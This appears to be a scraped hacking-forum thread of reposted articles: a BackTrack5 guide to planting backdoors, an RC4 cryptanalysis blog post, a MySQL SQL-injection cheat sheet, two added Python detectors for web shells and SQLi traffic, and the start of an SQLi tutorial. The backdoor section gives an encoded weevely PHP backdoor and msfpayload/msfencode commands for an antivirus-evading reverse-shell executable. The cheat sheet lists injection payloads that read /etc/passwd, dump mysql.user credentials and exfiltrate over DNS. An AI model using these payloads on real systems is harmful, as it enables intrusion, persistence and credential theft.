[h=2]Maintaining Access:[/h] Once we have access to the target website, we need to maintain access for future use because we don’t want to be starting from square one again and again. In order to avoid this, we can upload the web shells or backdoors to the target website. And encoding your backdoor is also important, since it should not create noise once uploaded in the server. If it does, then the administrators can easily detect it and remove the backdoors. BT5 comes with few good options for uploading webshells. Weevely: Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely. eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’)); Usage: To create a backdoor. Weevely.py –g –o filename –p password This will create a backdoor with a specific name and will be password protected. Upload to the target server and access the backdoor using the following command: Usage: weevely.py –t –u http://Remote-IP/backdoor.php -p infosec Webshells: Here is a list of specific web shells which can be used. These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. 
The following web shells available are simple-backdoor.php php-backdoor.php jsp-reverse.jsp cmdjsp.jsp cmd-asp-5.1.asp cmdasp.aspx perlcmd.cgi cfexec.cfm MsfPayload: Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating backdoor in msfpayload are as follows: We need to select the payload which we are going to use to get a Meterpreter shell spawned via a reverse TCP connection. The command would be: msf > msfpayload windows/meterpreter/reverse_tcp This payload needs two parameters: LHOST (attackers IP address), and the LPORT for selecting the port that we are going to use. The “R” is then used to give the output file in RAW data format so that we can encode it later on. Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This will create the payload but it has to be encoded in order to avoid AV detection. This can be done using the msfencode option. In order to do this, we need to pipe (“|”) the output generated by msfpayload to msfencode. Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe -e can be used to specify the type of encoding needed. Here I am using shikata_ga_nai encoding and –t for the type of file extension. Here it’s an exe file. Below is the image of the list of encoders available in MSF. Conclusion: These are but a few methods followed while performing an exploitation of a web application. Once we get the information about our target, try to perform a vulnerability assessment in order to get information about the loopholes which can be used. Once this is done, exploit the vulnerabilities and if necessary, upload a backdoor. As I’ve said before, encode the backdoors in order to avoid detection. Hope this helps you in finding vulnerability, exploiting and how to maintain access in your target. 
Sursa: Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5 | InfoSec Institute – IT Training and Information Security Resources
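As an added example from the defender's side (not part of the InfoSec Institute article), here is a small Python scanner that walks a web root and flags the PHP constructs the Maintaining Access section describes: eval(base64_decode(...)), calls to the shell-execution functions weevely probes for, request parameters fed straight into them, and long opaque base64 runs. The directory layout, file contents and indicator names are constructed sample data of mine.

```python
import base64
import os
import re
import tempfile

# Shell-execution functions named in the article as the ones weevely probes for.
SHELL_FUNCS = ("system", "passthru", "popen", "exec", "proc_open",
               "shell_exec", "pcntl_exec")

# Each pattern is one indicator; a real deployment tunes these against its own code base.
PATTERNS = {
    # eval() of a base64-decoded string: the shape of the weevely sample above
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    # request data (GET/POST/COOKIE/SERVER headers) passed straight to eval or a shell function
    "request_to_exec": re.compile(
        r"\b(?:eval|" + "|".join(SHELL_FUNCS) + r")\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b",
        re.I),
    # any call to a shell-execution function at all
    "shell_function": re.compile(r"\b(?:" + "|".join(SHELL_FUNCS) + r")\s*\(", re.I),
    # long opaque base64 run: encoded payloads hide behind these
    "long_base64": re.compile(r"[A-Za-z0-9+/]{60,}={0,2}"),
}


def scan_source(src: str) -> list:
    """Return the names of all indicators found in one PHP source text."""
    return [name for name, rx in PATTERNS.items() if rx.search(src)]


def scan_tree(root: str) -> dict:
    """Walk a web root and map each flagged PHP file (path relative to root) to its indicators."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = scan_source(f.read())
            except OSError:
                continue
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_webroot() -> str:
    """Create a constructed sample web root in a temp dir: one clean file, two suspicious ones."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "uploads"))
    # Harmless text, base64-encoded only to reproduce the eval(base64_decode(...)) shape.
    blob = base64.b64encode(
        b"echo 'constructed harmless sample payload, not weevely output';").decode()
    files = {
        "index.php": "<?php\nrequire 'config.php';\necho 'Welcome';\n",
        "backdoor.php": "<?php eval(base64_decode('" + blob + "'));\n",
        "uploads/cmd.php": "<?php system($_GET['cmd']);\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for path, hits in sorted(scan_tree(sample_root).items()):
        print(f"{path}: {', '.join(hits)}")
```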
18. [h=3]What's the deal with RC4?[/h]
[h=2]Thursday, December 15, 2011[/h]

Jacob Appelbaum tweets:
Does anyone have a good reading list on practically attacking RC4?

I don't propose to give an exact answer to Jacob's question here, but his tweet caught my eye for a reason. You see, just the other week I advised implementers to avoid RC4 -- both because it's easy to misuse, and because it has some real and theoretical flaws. But that doesn't mean any particular RC4 implementation is broken.

Instead, I'd prefer you to view my advice as the crypto equivalent of "don't run with scissors", "don't run near the pool", or "don't run near the pool while carrying scissors". I don't know anyone who's actually lost an eye because they ignored these warnings, but I'll still yell this stuff at my kids. It's common sense.

Still, that doesn't answer the burning question: how bad is RC4, really?

RC4, the stream cipher for the rest of us

First, some background. RC4 was invented in 1987 by Ron Rivest. It spent its first seven years as an RSA trade secret before it was eventually leaked to a public mailing list in 1994. The rest, as they say, is history.

You could argue that RC4's popularity was inevitable. For one thing, it was already in widespread commercial use. It was fast in software, something that DES wasn't. More importantly, the scheme itself is dirt simple. You can fit the code for RC4 onto a T-shirt, with plenty of room left over for, well, another T-shirt. And don't forget that, once leaked, the 'alleged' RC4 was free.

The scheme consists of two parts: a key scheduling algorithm (KSA), and a pseudo-random generator (PRG). To encrypt a message, you run the key through the key scheduler, which produces a scrambled array called the state vector. You then feed the state vector into the PRG, which continuously permutes it while outputting a series of bytes. You then XOR those 'keystream' bytes with your plaintext.

RC4 is probably most famous for its (mis)use in 802.11 WEP. It's still used in WPA-TKIP (unsurprising, since TKIP is just a bandaid patch for WEP). But its use goes way beyond that. For one thing, it's a common ciphersuite for TLS, and as of a year or two ago it was even preferred by browsers like Chrome. Up until recently, Microsoft used it everywhere. Skype uses it to obfuscate (though not to encrypt) its communication protocol. It shows up in malware and a zillion crappy DRM packages.

To make a long story short, you'll find RC4 anywhere the hardware was too weak, or the developers too lazy to use a better cipher.

The plain stupid

There are a few basic things you need to avoid when using any PRG-based stream cipher. These aren't specific to RC4, but for some reason they seem to crop up at a higher rate in RC4 implementations than with other ciphers.

The big honking obvious one is that you can't re-use the same RC4 keystream to encrypt two different messages. I hope I don't need to go into the consequences, but they're bad. Don't do it. You'd think this is so obvious that nobody could get it wrong, but that's exactly what Microsoft famously did back in 2005, encrypting different versions of a Word document with the same key. If you must use the same key for different messages, the solution is to combine the key with an Initialization Vector or 'nonce'. Unfortunately this can be problematic as well.

Another big issue is ciphertext malleability. If you flip a bit in an RC4 ciphertext, you'll see the same bit flipped in the decrypted plaintext. This is awesome at parties. More to the point, it can lead to practical padding-oracle type attacks that totally compromise the security of your encryption.* The solution to the latter problem is simply to MAC your ciphertexts. Unfortunately, people don't use RC4 because they know what a MAC is -- they use RC4 because you can download the code from Wikipedia.

So, again, I would say that this stuff tends to happen more than it should.

Key Scheduling

Leaving aside the stupid, the real problem with RC4 is the Key Scheduling Algorithm (KSA), which kind of sucks.

Picture a brand new box of playing cards. Starting with the unshuffled deck, work systematically from top to bottom, swapping each card's position with another card in the deck. The position you're swapping to is determined by a few simple computations involving the original card's face value and the cryptographic key. Now do this with a stack of about five ordered decks and you've got the RC4 KSA.

While this shuffle is thorough, the basic problem is that it isn't quite thorough enough. This leads to predictable patterns that show up in the first PRG output bytes. For example, Mantin and Shamir noted that the second output byte takes on the value '0' with about twice the probability it should. By itself that may not seem terribly useful, but for one thing: it's enough to practically determine whether an unknown algorithm is RC4, given about 128 keystreams on different (random) keys.

From what I can tell, the first person to notice problems with the KSA was Andrew Roos, who posted a paper to sci.crypt about a year after the leak. Aside from the fact that it was published on Usenet, Roos's result is notable for two reasons. First, he correctly identified use of concatenated IVs as a likely source of weakness in WEP implementations -- years before the FMS attack. Second, he gave recommendations that -- had they been followed -- would have prevented the whole thing. (Life lesson: don't publish important results in newsgroups.)

FMS

Roos's paper set the table for the most famous attack on RC4, and the one that people still associate with RC4, even though it's been improved upon substantially. This is, of course, the Fluhrer, Mantin and Shamir, or 'FMS' attack, which appeared in 2001.

Just like Roos, FMS looked at the KSA and found it wanting -- specifically, they discovered that for certain weak keys, the first byte output by the PRG tends to be correlated to bytes of the key. These weak keys can be obtained by prepending a few chosen bytes (say, 3 of them) to an unknown, fixed, secret key. Given keystreams resulting from 60 such chosen keys, you can derive one byte of the secret portion of the key. A 16-byte key can therefore be computed from about 960 such keystreams.

On the face of it this sounds pretty unlikely -- after all, how are you going to get an encryptor to prepend chosen bytes to their secret key? Fortunately the attack works fine even if the adversary just knows that the appropriate bytes were used. This works perfectly for implementations that prepend (or append) a known Initialization Vector to the WEP key. Simply by observing a few million IVs, an attacker can eventually collect enough keystreams to meet the FMS requirements.

All of this would have been a historical footnote if it hadn't been for protocols like WEP, which (among its many problems) used a three-byte prepended IV. FMS was quickly demonstrated to work on WEP, then packaged into a neat tool and distributed.

Klein, Dropping and Hashing

There are two competing approaches to dealing with the FMS attack:
Drop the first N bytes of the RC4 keystream, for values of N ranging from 256 to 3,072.
Don't concatenate the IV to the key, hash the two together instead.

The first option is sometimes referred to as RC4-drop[N], and the actual value of N has been subject to some debate. In 2006, Klein presented a super-charged variant of the FMS attack that reduced the number of needed IVs from millions down to about 25,000. More importantly, he showed that FMS-type attacks are still (borderline) viable even if you drop the first 256 bytes of the keystream. So 768 seems like a bare minimum to me, and some people will argue for much larger values.

The second approach was adopted for WPA-TKIP, which was proposed as a band-aid replacement for WEP. TKIP was designed to support legacy WEP-capable devices that had internal RC4 hardware, but weren't powerful enough to handle AES. It made a bunch of positive changes to WEP (including adding a larger IV to prevent keystream reuse), but the most notable change was a new custom hash function that creates a per-packet key from an IV and secret key.

As a hash function, the TKIP hash kind of stinks. For one thing, it can be inverted given only about 10 per-packet keys and about 2^32 computation (these days, a few minutes on a TI calculator). However, this isn't as big of a deal as it sounds: pre-image resistance isn't precisely a goal of the TKIP hash, since those per-packet keys should themselves be hard to obtain. Nonetheless, I wouldn't recommend that you mess around with it. If you must use RC4, try a proper hash function. Or better yet, don't use RC4 at all.

Distinguishers

RC4 is just a PRG, and a PRG is secure if its output is indistinguishable from a stream of truly random bits -- to a 'reasonable' adversary who doesn't know the key.** Hence a great deal of RC4 research focuses on the quality of the cipher's PRG.

So is RC4 a good pseudo-random generator? Meh. Given a mere 1.5GB of keystream data, Fluhrer and McGrew presented an algorithm that distinguishes RC4 from random. I already mentioned Mantin and Shamir who cranked this down to about 256 bytes (over various unknown, unrelated keys) by looking at the second output byte. Finally, Mantin noticed the presence of repeating patterns in RC4, which aren't simply dependent on the first few bytes of output, and can be used to distinguish RC4 given about 64MB of keystream.

There are, of course, other distinguishing attacks. But does it matter? Well, sort of. Indistinguishability is an important characteristic of a pseudo-random generator. If we have it, then the security argument for RC4 as a stream cipher is very simple: to an adversary who can't distinguish the PRG, RC4 encryption is indistinguishable from a one-time pad. Unfortunately the converse isn't true. Just because RC4 output is distinguishable from random doesn't mean that there's a practical attack on the cipher. These results are important mostly because they illustrate the fundamental wonkiness of RC4, wonkiness that doesn't go away just because you drop the first 3,072 bytes. But they don't exactly give us a practical opening into the cipher itself. Yet.

Ok, none of this was very helpful. I just want to know: can I use RC4?

Great question. Look, the upshot is that RC4, if used as recommended (with hashed IVs and/or dropped output and MACs), is perfectly sufficient for securely encrypting messages. Today. The problem is, we never know what the future will bring.

My advice? Don't run with scissors. You can lose an eye that way.

Notes:

* You might argue that RC4 implementations shouldn't use padding in the first place, since (unlike CBC mode encryption with a block cipher) messages don't need to be padded to a multiple of a block size. This is true -- however, I would note that 'padding oracle'-style attacks needn't rely specifically on padding. Padding is just one type of encoding that can leak useful information if used incorrectly. See Jager and Somorovsky's recent result on XML encryption for a great example of this.

** By reasonable, of course, we mean 'computationally limited'. This rules out attacks that require an unrealistically long time, quantum computing, or ESP.

Posted by Matthew Green at 8:11 AM
Source: A Few Thoughts on Cryptographic Engineering: What's the deal with RC4?
19. [h=5]Useful Stuff For SQLI[/h]
A handful of useful functions, syntaxes and queries for MySQL. Also known as a MySQL Cheat Sheet.
[h=4]chernabog[/h]

Version:
SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os

Directories:
SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir

Users:
SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()

Current Database:
SELECT DATABASE()

Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!

Multi-Concat:
#Stacks the row "foo" from the table "bar" together, using the separator "<br />".
#Note: This operation can by default only grab 1024 bytes, and does not allow LIMIT.
#The 1024 byte limit is stored in the @@group_concat_max_len variable.
SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar

Better-Concat:
#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT(),
#which therefore allows you to concat strings together up to the @@max_allowed_packet size,
#instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to
#1048576 bytes, instead of @@group_concat_max_len's 1024.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1)))

Change Collation:
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation.
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.

Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test".
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test".

Regular Expression in SELECT(s):
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'

SELECT Without Duplicates:
SELECT DISTINCT foo FROM bar

Counting Columns:
SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar".

Get Amount of MySQL Users:
SELECT COUNT(user) FROM mysql.user

Get MySQL Users:
SELECT user FROM mysql.user

Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges

Get MySQL User Privileges on Different Databases:
SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges

Get MySQL User Privileges on Different Columns:
SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges

Get MySQL User Credentials & Privileges:
SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv) FROM mysql.user

Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER'
SELECT host,user FROM mysql.user WHERE Super_priv='Y'

Get Databases:
SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT db FROM mysql.db
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables

Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.columns

Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.columns

SELECT A Certain Row:
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
...
SELECT foo FROM bar LIMIT N,1; #Returns row N.

Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" for 10000 times.
SELECT BENCHMARK(10000,MD5(1))

Sleep:
#Works only in MySQL 5 and above.
#Sleeps for 5 seconds, returns 0 on success.
SELECT SLEEP(5)

Conversion (Casting):
SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
SELECT CAST('65' AS CHAR); #Returns: A

Substring:
SELECT SUBSTR('foobar',1,3); #Returns: foo

Hexadecimal Evasion:
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :

ASCII to Number:
SELECT ASCII('A'); #Returns: 65

Number to ASCII:
SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test

If Statement:
#Returns 1 if the database is running MySQL 5.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
#Returns 1 if the database is running MySQL 4.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);

Case Statement:
#Returns 1 if the database is running MySQL 5.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
#Returns 1 if the database is running MySQL 4.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END

Read File(s):
#Requires you to have the File_priv in mysql.user. On error this statement will return NULL.
SELECT LOAD_FILE('/etc/passwd')

Write File(s):
#You must use quotes on the filename!
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World')

Logical Operator(s):
AND, &&; #The AND operator has && as an alternative syntax.
OR, ||; #The OR operator has || as an alternative syntax.
NOT, !; #The NOT operator has ! as an alternative syntax.
XOR; #The XOR operator has no alternative syntax.

Fuzzy Code Comment:
#Code within /*! is executed by MySQL. Additional /*! can be used instead of space as evasion.
SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/

Comments:
SELECT foo, bar FROM foo.bar-- Single line comment
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-byte. It does not work together with PHP though.

A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carriage Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parenthesis, ( and ); #Can also be used as separators when used right.

Parenthesis instead of space:
#As said two lines above, parentheses can be used as a separator.
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))

Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() converts the hexadecimal value(s) to the current collation.

DNS Requests (OOB (Out-Of-Band)):
#For more information check this.
SELECT YourQuery INTO OUTFILE '\\\\www.your.host.com\\?file_to_save_as.txt'

Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA.
#It can be done if you're able to upload a shared object into /usr/lib.
#The file extension is .so, and it must contain a "User Defined Function", UDF.
#Get raptor_udf.c, it's the source-code for just that feature.
#Remember to compile it for the right CPU architecture.
#The CPU architecture can be resolved by this query:
SELECT @@version_machine;

A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.

Version:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4

Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1

Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1

Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1

Can MySQL Sleep:
#This query will return True and should take above 1 second to execute, if it's a success.
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1

Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1

Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47

Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1

Does a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0

Does a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0

Does a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0

From: h.ackack(dot)net
Source: Usefull Stuff For SQLI
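As an added defender-side example (not part of the cheat sheet or its source), here is Python detection logic that runs over web-server access log lines and flags the constructs listed above: UNION SELECT (including the parenthesis and /*!...*/ spellings), SLEEP()/BENCHMARK(), information_schema and mysql.user probes, LOAD_FILE/INTO OUTFILE, VERSION() fingerprinting and the ;%00 trick. The log lines are constructed samples in common log format and the signature names are mine.

```python
import re
from urllib.parse import unquote_plus

# One access-log line in common log format (constructed layout used by the samples below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures run against the normalised query string; each maps to a cheat-sheet construct.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s(]*(?:all[\s(]*)?\bselect\b", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.|\bmysql\.(?:user|db)\b", re.I),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I),
    "version_fingerprint": re.compile(r"\bversion\s*\(\s*\)|@@version", re.I),
    "char_probe": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
}


def decode_query(raw: str) -> str:
    """URL-decode twice so double-encoded payloads (%2520 -> %20 -> space) become visible."""
    s = raw
    for _ in range(2):
        s = unquote_plus(s)
    return s


def normalise(decoded: str) -> str:
    """Turn the separators the cheat sheet lists (/**/, /*! ... */, NUL) into plain spaces so
    the keyword signatures see 'UNION SELECT' even when written as /*!UNION*//*!SELECT*/."""
    s = decoded.replace("\x00", " ")
    s = re.sub(r"/\*!?", " ", s)
    s = s.replace("*/", " ")
    return re.sub(r"\s+", " ", s).strip()


def classify_query(raw_query: str) -> list:
    """Return the signature names matched by one raw (still URL-encoded) query string."""
    decoded = decode_query(raw_query)
    hits = []
    if "/*!" in decoded:   # MySQL version-conditional ("fuzzy") comment used as a separator
        hits.append("fuzzy_comment")
    if "\x00" in decoded:  # %00 appended to cut the statement short
        hits.append("null_byte")
    norm = normalise(decoded)
    hits.extend(name for name, rx in SIGNATURES.items() if rx.search(norm))
    return hits


def analyse_log(lines) -> list:
    """Parse log lines and report each request whose query string matched a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        sigs = classify_query(query) if query else []
        if sigs:
            findings.append({"ip": m.group("ip"), "path": path, "signatures": sigs})
    return findings


# Constructed sample traffic (not real logs); the queries mirror the cheat sheet's constructs.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Dec/2011:06:30:01 +0200] "GET /item.php?id=42 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:02 +0200] "GET /item.php?id=1%20AND%20ASCII(SUBSTR(VERSION(),1,1))=53 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:03 +0200] "GET /item.php?id=(-1)UNION(SELECT(1),(2)) HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:04 +0200] "GET /item.php?id=1%20AND%20IF((SELECT%20SLEEP(1))=0,1,0)=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:05 +0200] "GET /item.php?id=1/*!UNION*//*!SELECT*/1,LOAD_FILE(0x2F6574632F706173737764) HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:06 +0200] "GET /item.php?id=1%2520AND%2520SLEEP%25285%2529 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:07 +0200] "GET /item.php?id=1%3B%00 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Dec/2011:06:30:08 +0200] "GET /item.php?id=1%20AND%20(SELECT%20COUNT(table_name)%20FROM%20information_schema.tables%20WHERE%20table_name%20LIKE%20%27users%27%20LIMIT%200,1)%3E0 HTTP/1.1" 200 512',
    # Keyword-only rules have false positives: an ordinary search term trips union_select.
    '10.0.0.9 - - [19/Dec/2011:06:31:00 +0200] "GET /search.php?q=credit+union+select+branch HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']}: {', '.join(f['signatures'])}")
```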
20. Yes... What is a man supposed to do at 06:30 AM when he can't sleep? I've been posting since last night.
  21. SQL Injection (detalied) Tutorial created by ande for www.evilzone.org Written December 27, 2009. Updated May 29, 2011. In this tutorial 1.0 What is SQL? 1.1 Types of SQL or SQL engines 1.2 Understanding the SQL structure 1.3 Finding vulnerabilities 1.4 Exploiting vulnerabilities 1.5 Securing vulnerabilities 1.0 What is SQL? SQL stands for Structured Query Language. It is a way to store, modify and update data secure, fast and reliable. SQL is mostly used for web sites but can however be used for almost any application and or service which is in need of storing, editing and or updating data in a good and structured way. In this tutorial I will be using PHP as script language for examples. PHP is a web script engine. Its the most widely used one, its the best one and its the one you are most likely to encounter in real life scenarios. Now, you might think; But if I only learn this on one type of script, don't I have to learn all of this for all other types of scripts?(ASP, ASP.NET, Java, Perl, CGI, [...]) No, you don't. The concept remains the same. However, to truly understand SQL injection on various script types, I encourage you and recommend you from the bottom of my heart to learn the languages. You don't have to learn them all, but perhaps the top 3 most used or something like that. At least PHP. Additionally I will be using MySQL as the SQL engine in examples. Theoretically SQL can be used by any script engine as it is basically just a application listening on a port on a server waiting for commands/instructions. The only requirement is the ability to use TCP/IP protocol. However some script engines like PHP and ASP(.net) got pre-made classes and functions for some of the most common SQL engines. Making it a whole lot easier to interact with the SQL server. In order to run PHP scripts(at least in a browser) you are going to need a PHP supported web server. 
It is not required to write a single line of code or install anything on your computer to complete this tutorial. But it's a good idea to experiment with all of the elements in this tutorial: PHP, MySQL and a web server (I recommend Apache).

